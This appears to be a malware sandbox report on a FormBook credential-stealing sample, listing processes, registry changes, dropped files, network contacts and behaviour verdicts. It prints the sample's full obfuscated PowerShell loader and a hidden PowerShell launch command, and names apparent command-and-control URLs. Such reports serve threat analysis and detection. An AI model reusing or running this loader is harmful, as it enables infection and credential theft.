BC m3 G8Un2Tw1un2BlDVe2DoBBe2MeDTr6Me8Te7Me5en6Wh8Be6ReC F0GnFAe2Fe4Sp2Hk9un3 IBIa3InBUr2AlA F2fu4vi2De7Te3 SF P2Vi1Ak2de6Ha2 KFYa6 A6su0Sn1Me2Ni6Ey3 FEap2ta7Ma2vi3No2StDYa6 C0Ba1Nu3At0Pe1Tu2Tr6Ak3 FCWh1 B8Po3saCSu3ToALs1 U5Mo7Ov2Ge7Re2 L1Ud2He2 MDAs3SvARa2 C7Ba6Na4Ho6Al8 S7 L0El7KnBTi7tr9sa7Ra0nd7Ja1 G7AtFRe7EfELi7Re8 F6 M4Ac6Fe8Ca7re8 f3St0 c7 EBCa7Fr8 U7Sn8Dr7Hy8Er6La4Sl6St8Sm7 f8Ga3St0Ud7RyCFl6 J1Lu'De;Co& b(Vi`$VaMSniStc PrbaoRecSaoAnpAniRueRossp7Gr)su In`$ RBMeeUktAnoTrnNobDolAua VnRad UeSkrunnduerg8Al;Fl`$GrBTioAnd MeDtmWuiMudUnlPae stTosBa2Gn=Re`"""Fr`$Goe snKrvUn:laTOuEReMTtPAs\SobThaLykNskVaeAngPraRda RrBidMae MnDm\ SvSkaPrgAniSin EaAneRergunbreSp\OpUKenbopSkr DiLimStiSyt LiOtvVaeSalsoyUr6As3ab\TrFUna blins HuchmPemDae Ft V. DQAcuFaiFo`"""Uf;Bo`$ PBKoeBatJoo Cn abEllMoaMon BdPseHrrHan Se R9Di Pr=Mo GaVpuA TR A5So3Pr A' T6TiCMe0OmAPa2IoDPa3LaCSy2Ve7Ma2My6Ru2KyAWi2Ko4Ae2ar9Ad2 F6 s2PhCGu2 cDIn3OmASu2Pr6Tr2AnDsu6Ch8Do7Py5Mo6 I8So1Rh3We1ClBHe3Sg1Tu3 PB a3LaCMa2chDMu2Pr5 P6Pr6Ty0Ch1Aa0Fu7Sv6 I6 B0PoENa2St1Qu2em4El2ArDCo1Su5Dy7It2Ma7Om2 S1UdAFi2 FDUn2Au9Un2UnC W0Pr9Te2gr4 W2 C4 T0AfANo3Pi1 T3 hCOs2EsDMu3HoBKa6Or0 s6 BC R0noAFr2 V7Le2MoCHa2MaDSk2Ts5Pi2Ho1 F2SeCDe2La4Dy2TyDUn3SnC B3GaB F7ThAUd6Bo1Dy'Fo;Di&Cu( O`$CyMCaiBicParPro Sc GoMopLaiGoe AsTa7Ur)Il Pl`$ OB KeSltReoRenCabRelJiaFrnUnd ReOrrConKneDe9Te;Kl`$ Fh ge Dr ObObiUnvReoAfrCoi StAuyPa0El Pr=De OVSoA CRFo5Sa3Op Fo'Ho1St3Fi1AsBBa3 F1 P3 BB A3ReCNa2 RD F2Un5Co6cr6Sp1SqALa3BrDAr2Ba6Re3MoCHi2jo1Ha2Bf5Fr2FoDUn6an6Er0 S1Go2th6Os3AdCCe2LeDLr3NeAFo2so7 H3Ca8Do1 BB D2 BDLi3unA E3 FECa2Pa1Qu2AfBAr2StD s3 LBDi6Ur6Pr0Se5Ch2co9Sp3jaA K3FlBTe2Pr0Le2an9Rd2 A4Bo1Sh5La7Ji2Be7Am2Ov0biBCo2Pi7Pi3re8 C3Hy1Tr6Wa0 V6IfCEs0baACh2MiDIn3 kCAl2Vi7Me2Va6Un2LiADr2Li4St2De9Pl2Sa6 K2 TC B2 FDSu3ShABe2 S6 R2DeDAn6Es4or6Wh8St7ToBSk7Ko8Cr7MaAUd7blCAs6Af4Fn6Ru8 p6fa8sp6BeCTj0SvAHa2 U7Ur2TvCEx2 BDSp2En5Co2Tj1su2AlCRe2Fe4 O2FoD P3BiCSp3ShBMe7 LBCu6Le4Dr6Up8Sk7LaE S7JuCSo7Ri8Ka6 B1Co' S;Ch&Sa(Sm`$ FMCriricDurscoGnc Bo ApPoiNoeKisAn7 A)Sl a`$HuhadeberOmb OiAzv RoHyrHaigotLayFo0Po;Ex`$DiEJag PuAleFaipliSut Eeba=pr`$EnBTweEntHyoasn Pb UlLaaChn Sd MeHur PnKneUn. Ucgeo SuCan ct R- P6Sj4 P0Bo-Ga3Ra0Je2 B4un;Pa`$InhAneOvrSibGai RvSkoZer SiFltTeyso1 M Br=Un CoVUnAHjRYu5 P3Ch ma' S1 A3ga1DiBBy3 T1Fa3PaBMi3FaCus2LoD K2Tr5Ja6Pe6de1NoATr3 WDBo2Hj6Be3AaCAc2Lg1Pe2Ti5Ep2SmD O6Te6 B0Un1In2Fi6Av3edCIn2MiDTe3MeAAr2Sk7 F3Pr8 E1RoBfi2TiDDa3 CA F3fsEng2Bo1 B2BiBOm2TrDMu3JeBLi6Ma6 D0De5Pr2Pa9Ub3InAFe3skB T2Re0No2La9Os2 M4Ch1Be5Al7Ed2Wa7Ca2 H0SaBSu2Bi7Fo3To8Ti3Fo1Ar6Un0El6MaCNo0 IAcr2BaDNu3KaC E2Fr7Or2Co6Se2SuACo2Tr4 v2Pl9 K2Ra6Sk2 BCun2 AD S3KrADe2Fa6Fo2OuDEt6Ve4Sp6Ce8Ba7 SESa7BiCSe7By8Mo6Bs3Ma7IrB S7 D8Na7AfAOv7ToCme6Fj4Ce6Pi8Nu6SpCMe0EnEef3TaA Y2 F7Vi2vi6Fu3 MC J3 R8Sy2Ho1Se2SpDDi2ToBRu2BeDCo6 S4ho6Fo8 K6ReCSl0DoDSt2StFMo3RnDCo2DeD D2Co1Ek2Ma1Co3AmCPa2PlDNa6ur1 A'Sn; O&Fl(Po`$GrMMei AcPrrBaoStcQuomipstilyeIns T7Pe) U Bl`$LehImeGrrfobsoiMovPeoSprDii BtKry C1 O;tr`$UnhSkeMaratbspiDrv So ErStiCot Symo2In P=Pa OVGaA JRFo5Ty3Li Sk'Fu6PhCGo3 O8Me2 L0Kr2Tm1 A2Ny4Ge2Ka7 I2In6 S2 A1Un3SpDsu2La5Hn6Sa8Kn7Un5bf6An8Su1re3Ug1EkB I3Ba1Ol3 UBla3 PCBr2UnDAr2Kv5Am6Ln6Ro1 HAPa3SnDse2Pi6An3SnCNo2Re1ca2He5 F2FeDSu6Be6Eg0Sk1Sy2By6Dh3NaC I2isDAr3LaAAd2 K7St3Fo8 S1paB b2hoDpa3DoAAg3TaE v2An1So2 IBJe2ElDBa3TaBMu6sl6 S0Da5Py2Yi9Mi3FrADj3shBHj2 G0Sp2Ba9Ci2Ev4Un1Sh5ta7Ko2 U7Mo2Si0KaFDi2LoD B3SlCTu0MiC P2WoD U2Ae4Ax2CoDBi2NrFTh2Ga9Re3HeCGu2 GDIn0ReETv2La7Ra3JoAMa0CoELo3osD V2Ch6 U2NeB S3FnCRe2Ps1Ed2 F7Vr2Al6Da1Ou8At2On7Po2Re1 s2Re6Ul3YvCEu2HaD U3ViA S6Un0Bl6 s0Lo2 IEIg2Fo3Pl3To8Ad6Tu8Sn6peCSe0FuBAl3Be1Ep3 ICAd2Ri7Ta3Ud8Sc2 D9Pa2Es0 B2SeFFi2Ze7Mi3DeDSk3AsBBe7Me9Gu7NoF P7 IEDi6Ak8Sa6 kCIn1Si8 D3 CDPl2AeAMa2Dy1Ag2Ag9 L2Be6ad6 G1Bu6su4Fo6Sl8Mo6 A0Ma0BeFNo0JeCLy1niCCa6 C8Fl0Ep8 I6Si0Uh1Du3Pe0Gr1 K2 K6Ru3CeCTe1Fo8Fo3SmCHu3saARe1Le5Fr6Co4 F6Bo8 F1Sp3Fu0Le1Sy2Up6Ho3IdCTr1Pa8 O3SuC B3BjABn1Bj5Un6Tr4Hv6Di8Se1 S3Sp0In1 B2Pe6Fe3 CC L1Pu8 f3ApCCh3SaAFr1Sk5 a6Pr4 X6 K8Ur1Fr3Va0Re1 M2Mr6Vs3SpCRo1 D8Tr3PaCko3soA A1Hi5Sk6Ov4 F6Ko8Ad1Be3Hy0In1 S2Ov6Bo3DiCSe1Ak8Un3 SCvo3ReADe1Pe5Sd6Di1 N6Sa8pl6Ge0Sy1ca3Bi0Mi1kn2Ta6Ta3ElCRh1Sw8Ja3RiCHe3MyAMo1 D5 E6Fr1 k6Be1 U6sl1Ka'Pu;Pl&su(no`$GhManiDacInr AoFrc PoacpFiiHjeHisAf7Sh)An Fi`$MohUne TrUdbthi UvepoDerSti gtGoyVa2Tj;Ho`$MehLoeRerShb siRovivoTorouiTetPryko3Sc Pe= E FeVHoABrRBr5Re3Lo S' D6 ECFe3 e8Ha2Ad0Ud2Qu1Ap2Er4Fa2Ho7Tw2La6In2Ab1Di3TrDKo2la5 L6hy6Br0Ra1 F2Cl6Un3 RESo2An7Ce2Ta3Ga2HoDPa6In0 A6UnC L0AlA D2Ga7 R2ZiCIn2LyDPe2Az5Sp2Go1ud2 DC R2Un4ch2ImDAs3HnCSu3 SBas7TrBYn6 T4 U6TaCHe0ReEFo3BrA C2Fa7Sh2 L6By3EuCHa3Ln8Re2Su1Ep2 MDFo2biBIr2FrDTi6Do4Te6StCIn0SuDFe2AfCJa3AmFDi2Ti9Em3OmASp2PoCSu3 SB J6Ki4Su7Te8Bo6Di4Gl7Fo8Re6Ty1Fo'Tv;Te&Fa(Or`$ PMEtiHecborUdoLic SoHepReiEleInsCe7Di)Ag Lo`$FlhQuePsrUnb SiAbvHooInrKaiUdtcay N3In#Un;""";<#Epilamellar Faglrereksamenernes Selvmorderisk Unvetoed Place Parlr Hypobromites #>;;function herbivority8 ($vandskellenes,$Municipalities45) { &$Papains0 (herbivority9 'Mi$UdvAnaChnBedMesDdkReeCol BllieIlnBueTisVa La- JbStxGroMerTr V$ UMSeu BnIniTrcSaiMepBlaLalTriBetPriGeeAms P4Sp5So ');};Function herbivority9 { param([String]$Monsunens); <#Endomixis superinformally Androgynism Graphicsmenu Breastbones Upaaviseligheds Vrinsker #>; $Colas=2+1; For($Kompressions=2; $Kompressions -lt $Monsunens.Length-1; $Kompressions+=($Colas)){ <#Afmagringskurenes Biomasses Udste Limningerne Penoncels #>; $Residency80+=$Monsunens.Substring($Kompressions, 1)} $Residency80;};;$Papains0 = herbivority9 'EgIFoEInXPa ';$Papains1= herbivority9 $Missionens;&$Papains0 $Papains1;<#Harmonien Niveauoplysninger Pandoors Eluvium #>;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.14409.1005 (rs1_srvoob.161208-1155)

Modules

Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

1944

C:\Windows\Explorer.EXE

C:\Windows\explorer.exe

—

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Explorer

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll

2408

"C:\Program Files\Mozilla Firefox\Firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

—

verclsid.exe

User:

admin

Company:

Mozilla Corporation

Integrity Level:

MEDIUM

Description:

Firefox

Exit code:

Version:

115.0.2

Modules

Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msasn1.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll

2652

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Contacts

Exit code:

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\syswow64\certmgr.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll

2784

"C:\Users\admin\AppData\Local\Temp\JOU23013126.exe"

C:\Users\admin\AppData\Local\Temp\JOU23013126.exe

—

explorer.exe

User:

admin

Integrity Level:

MEDIUM

Exit code:

Modules

Images
c:\users\admin\appdata\local\temp\jou23013126.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

2864

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle minimized $fe32 = Get-Content 'C:\Users\admin\AppData\Local\Temp\bakkegaarden\vaginaerne\Unprimitively63\Gasunitterne.Aka' ; powershell.Exe "$fe32"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

—

JOU23013126.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.14409.1005 (rs1_srvoob.161208-1155)

Modules

Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

2892

"C:\Windows\SysWOW64\verclsid.exe"

C:\Windows\SysWOW64\verclsid.exe

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Extension CLSID Verification Host

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\verclsid.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

Add for printing

Total events

5 232

Read events

5 161

Write events

Delete events

Modification events


(PID) Process:	(1944) explorer.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
Operation:	write	Name:	CheckSetting
Value: 01000000D08C9DDF0115D1118C7A00C04FC297EB01000000088AF72B0747534094337F63DE35C94A000000000200000000001066000000010000200000003A7AE26404D75DF41C31FF40C5EA8CE90BAF74FA9E9BD7A9ACA34C7048350C1E000000000E8000000002000020000000BD2D56D46506C12C41A6A70B10E79EE53CB79EF36FD2BA8CDD2460CB8F4BE86A300000009B5D1418CBF2EB49F3C4BD4C21D58CA55B82FA3D3ED08AF0EF59D6C7ECAFC1055FA323A80FF7C154B1C9B60253392B6640000000DED9FDCC168073324C3013F1BB125E066EB1A2F09FD2C8E7CC7A793AA992E21EF1C942BF7294D04E036428704009B863B1CB981B97312E2530E3E816780CF7C9
(PID) Process:	(2784) JOU23013126.exe	Key:	HKEY_CURRENT_USER\Software\fredensborg
Operation:	write	Name:	satiate
Value: 179E8E
(PID) Process:	(2784) JOU23013126.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\polemonium\Uninstall\insolvence
Operation:	write	Name:	Maskeforbuds31
Value: 0
(PID) Process:	(2784) JOU23013126.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	ProxyBypass
Value: 1
(PID) Process:	(2784) JOU23013126.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	IntranetName
Value: 1
(PID) Process:	(2784) JOU23013126.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	UNCAsIntranet
Value: 1
(PID) Process:	(2784) JOU23013126.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	AutoDetect
Value: 0
(PID) Process:	(1944) explorer.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Operation:	write	Name:	HRZR_PGYFRFFVBA
Value: 00000000D000000004010000EF256C001600000007000000864D06007B00310041004300310034004500370037002D0030003200450037002D0034004500350044002D0042003700340034002D003200450042003100410045003500310039003800420037007D005C0063006D0064002E00650078006500000010030000000000D3A70200000000A5FE20FEFE07000002000000000000004DBC20FEFE070000000000000000000080DF100300000000D8ED1003000000000100000000000000000000000000000004FE20FEFE07000000000000000000000100000000000000D8ED100300000000020000000000000032001400BE0E000030C22D000000000001100211B70000005F4C6D090000000000D3A702000000000000000000000000E0E42D0000000000880000000000000040B35CFEFE0700000000000000000000000000000000000000002B0000000000C803CE77000000000000000000000000D00300000000000000002B0000000000B0DFAD0700000000C10300000000000048062B000000000048DDC177000000000600000000000000C10300000000000002007C002506730030C22D0000000000807CA607000000000000000000000000D0ED100300000000080000000000000010AB990900000000207D2B0000000000C8225DFEFE0700001C7F2B0000000000A0C42D00000000005B590EFFFE0700000200000000000000E8629C070000000010AB990900000000A54208FFFE070000C803CE7707000000250000004B7A0B004D006900630072006F0073006F00660074002E00570069006E0064006F00770073002E0043006F006E00740072006F006C00500061006E0065006C00000075006C0074000000000000000000010000000000000088E2EA0200000000000000000000000030E0EA020000000028E0EA020000000020E0EA0200000000586705FCFE070000000000000000000040E0EA0200000000000000000000000000000000000000003E00400000000000B0E8EA02000000003053A203000000000000000000000000000000000000000022BBD2FF0000000000003D4A62B00000E000070000000000A210000000000000E0F1EA02000000000000000000000000300B8B0200000000A4768F0200000000D4AF17FEFE070000B0E3EA0200000000200C9C0A000000000100000000000000D46905FCFE0700001500000007000000790E06007B00310041004300310034004500370037002D0030003200450037002D0034004500350044002D0042003700340034002D003200450042003100410045003500310039003800420037007D005C0063006D0064002E006500780065000000EA02000000000540008000000000542D8CFFFE070000000000000000000068006C02000000005C0001000000000000000000000000000000280000000000EB1A6E770000000068006C020000000000000000FE070000282595FFFE070000A00D33000000000018006C02000000001B000000E8261C007B00310041004300310034004500370037002D0030003200450037002D0034004500350044002D0042003700340034002D003200450042003100410045003500310039003800420037007D005C007400610073006B006D00670072002E006500780065000000008000000000542DC9FDFE070000000000000000000068009902000000005800010000000000000000000000000000002B0000000000EB1AC07700000000680099020000000000000000FE0700002825D2FDFE070000F099A90200000000180099020000000000000000000000000100000000000000BF1DC9FDFE07000030E010030000000010D1AB020000000000000000000000003B94B8FDFE070000B04EAB020000000008009902000000005800010000000000869AAE7700000000C7F7CF529EC5000082020000000000000000000000000000580001000000000000000000000000008202000000000000020000000000000058000100000000000000000000000000820200000000000080A630FF00000000C81222FF00000000B04EAB020000000001000000000000000F0000C00000000090DFDD0300000000820200000000000001000000000000008202000000000000DB9BAE77000000005800010000000000000000000000000000000000000000000100000000000000000000000000000081020000000000000000000000000000000000000000000000000000
(PID) Process:	(1944) explorer.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\MuiCache\15A\52C64B7E
Operation:	write	Name:	LanguageList
Value: en-US
(PID) Process:	(2652) wab.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:	write	Name:	ProxyEnable
Value: 0

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2784	JOU23013126.exe	C:\Users\admin\AppData\Local\Temp\bakkegaarden\vaginaerne\Unprimitively63\Gasunitterne.Aka		text
		MD5:B2345020215675EA69D5EF972174A8A9	SHA256:95F5BE20D2CC1A8D7175A7828DF34A75E7162F3BF90AB8F622B6CA899E33F0F3
2784	JOU23013126.exe	C:\Users\admin\AppData\Local\Temp\bakkegaarden\vaginaerne\Unprimitively63\Falsummet.Qui		binary
		MD5:0CDC35D2AAA4B7C9E816ECD2BBA85F91	SHA256:0EFBE7845AD934B5BB9EC0AAF7B9BF2C2AC24884A68F9EF846C3EC9D5935F3DD
2784	JOU23013126.exe	C:\Users\admin\AppData\Local\Temp\bakkegaarden\vaginaerne\Unprimitively63\Cambodia\Lydlsestes\Undiffidently.veh		binary
		MD5:8B5EACA39FBE3F7C604291F770650754	SHA256:5332E7356F7C49A7D78A9EB91B96BBB88CCEF267614EFD5E3AB399DE23982D1A
2784	JOU23013126.exe	C:\Users\admin\AppData\Local\Temp\bakkegaarden\vaginaerne\Unprimitively63\Cambodia\Lydlsestes\gravstik.pre		binary
		MD5:1970B6A4EEB916CA009528F7D5A02886	SHA256:3BE12113631807979D3F289CD639CC9558C0A45CCDB0FDC6E4ED954FAEB67403
2784	JOU23013126.exe	C:\Users\admin\AppData\Local\Temp\bakkegaarden\vaginaerne\Unprimitively63\Dato\Erotiseres\Heterophonic.for		binary
		MD5:AADF973A5A6565556272B2EB1CF0AC6C	SHA256:FC4A5F5A396694D97C994776884E3DB4E46C52D07F37AF69604767E28A2305AF
2652	wab.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506		compressed
		MD5:AC05D27423A85ADC1622C714F2CB6184	SHA256:C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D
1760	powershell.exe	C:\Users\admin\AppData\Local\Temp\xj0onuim.vhx.psm1		binary
		MD5:C4CA4238A0B923820DCC509A6F75849B	SHA256:—
2864	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache		binary
		MD5:C2A2D3AF5C713A6426F88B78A390C3AC	SHA256:1E8EE77230F92B55A6D035008DBFBA2A39FE672ADD341718686745CBADA4C57E
1760	powershell.exe	C:\Users\admin\AppData\Local\Temp\surtli4s.kli.ps1		binary
		MD5:C4CA4238A0B923820DCC509A6F75849B	SHA256:—
2652	wab.exe	C:\Users\admin\AppData\Local\Temp\Cab693F.tmp		compressed
		MD5:AC05D27423A85ADC1622C714F2CB6184	SHA256:C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
1944	explorer.exe	GET	200	91.195.240.117:80	http://www.weber-e-store.com/e8hp/?zh9V=6ogENvkkhYmkJUdkJY+Hpsy09w+KPr3PMI4xRkw3xAPeFuIaS/+qPXfTM1HoOnpPOpaDZQ7/2Zb4TVdJhQRtfe/VlJvIosqhfNoT0Ww=&dqW9B=8R-e	unknown	html	21.1 Kb	unknown
2652	wab.exe	GET	200	72.247.153.178:80	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?02fcedf5d62a0579	unknown	compressed	65.2 Kb	unknown
2892	verclsid.exe	GET	200	45.33.6.223:80	http://www.sqlite.org/2019/sqlite-dll-win32-x86-3300000.zip	unknown	compressed	478 Kb	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
1956	svchost.exe	239.255.255.250:1900	—	—	—	whitelisted
324	svchost.exe	224.0.0.252:5355	—	—	—	unknown
4	System	192.168.100.255:138	—	—	—	whitelisted
2652	wab.exe	50.115.174.254:443	www.lemartinez.za.com	VIRP	US	unknown
2652	wab.exe	72.247.153.178:80	ctldl.windowsupdate.com	Akamai International B.V.	DE	whitelisted
1944	explorer.exe	91.195.240.117:80	www.weber-e-store.com	SEDO GmbH	DE	unknown
2892	verclsid.exe	45.33.6.223:80	www.sqlite.org	Linode, LLC	US	unknown

DNS requests

Domain	IP	Reputation
www.lemartinez.za.com	50.115.174.254	unknown
ctldl.windowsupdate.com	72.247.153.178 72.247.153.162	whitelisted
www.weber-e-store.com	91.195.240.117	unknown
www.sqlite.org	45.33.6.223	whitelisted
www.donaldview.net	—	unknown

Threats

Found threats are available for the paid subscriptions

2 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

JOU23013126.exe

2F3EE0A5E9AAD3010204C7A547761E13

DB3BB0FA734A9F555E01D2011DC8E626ABE9AAA6

3E3AC1D0D519E933394B3C728713B102B9CA63D57BC2427591F4FCCF0C9C012A

24576:1BuJgC86f6W5vbMhvzavIs7oLCEACHHl2k95XVXZBSq9uq7G3QK:LuJgC86f6W5vbMhvzavIs7oLC3CHHl27

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

Drops the executable file immediately after the start

Connects to the CnC server

FORMBOOK has been detected (SURICATA)

Steals credentials

FORMBOOK has been detected (YARA)

Actions looks like stealing of personal data

SUSPICIOUS

Reads the Internet Settings

Base64-obfuscated command line is found

Starts POWERSHELL.EXE for commands execution

Application launched itself

Checks Windows Trust Settings

Reads security settings of Internet Explorer

Adds/modifies Windows certificates

Reads settings of System Certificates

Process drops SQLite DLL files

INFO

Reads the computer name

Create files in a temporary directory

Checks supported languages

Creates or changes the value of an item property via Powershell

Checks proxy server information

Reads the machine GUID from the registry

Manual execution by a user

Creates files or folders in the user directory

Drops the executable file immediately after the start

Malware configuration

Static information

TRiD

EXIF

EXE

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings